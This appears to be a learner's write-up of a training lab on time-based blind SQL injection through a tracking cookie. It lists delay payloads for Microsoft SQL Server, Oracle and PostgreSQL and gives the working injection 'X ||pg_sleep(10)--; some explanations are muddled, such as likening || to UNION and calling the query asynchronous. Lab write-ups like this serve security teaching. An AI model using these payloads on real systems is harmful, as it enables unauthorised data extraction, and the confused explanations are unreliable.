Problem Statement :
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.
To solve the lab, exploit the SQL injection vulnerability to cause a 10 second delay.
To solve this lab we will be using Time delays –
You can cause a time delay in the database when the query is processed. The following will cause an unconditional time delay of 10 seconds.
|Microsoft||WAITFOR DELAY ‘0:0:10’|
Conditional time delays
You can test a single boolean condition and trigger a time delay if the condition is true.
|Oracle||SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN ‘a’||dbms_pipe.receive_message((‘a’),10) ELSE NULL END FROM dual|
|Microsoft||IF (YOUR-CONDITION-HERE) WAITFOR DELAY ‘0:0:10’|
|PostgreSQL||SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END|
Solution was simple in this case. Because, it was just to create the time delay.
As discussed above, try using all of the above methods (oracle, microsoft, postgreSQL, MYSQL) since we don’t know which database this below site is using.
Lets see the steps.
- So basically, here we don’t know what is the response, there is no error nothing. So we can use this time delay technique to find out what is happening.
Below example – from the MYSQL DATABASE. When the condition is true and matches with the values inside the database then the delay condition will be triggered and they query will be delayed as described and will be executed after that xyz delay which we have defined.
In the below example – I am querying First name ‘vicky’ then the query will wait for 10 seconds and then execute.
Similarly way, the below Lab was for PostGreSQL : –
Note: here the 2 pipe here is nothing but string concatenation in postgreSQl.
Like we use UNION in mysql/MSSQL.
In another way we can also say we are running the below Asynchronous query refer to Note above.
Query : ‘X ||pg_sleep(10)–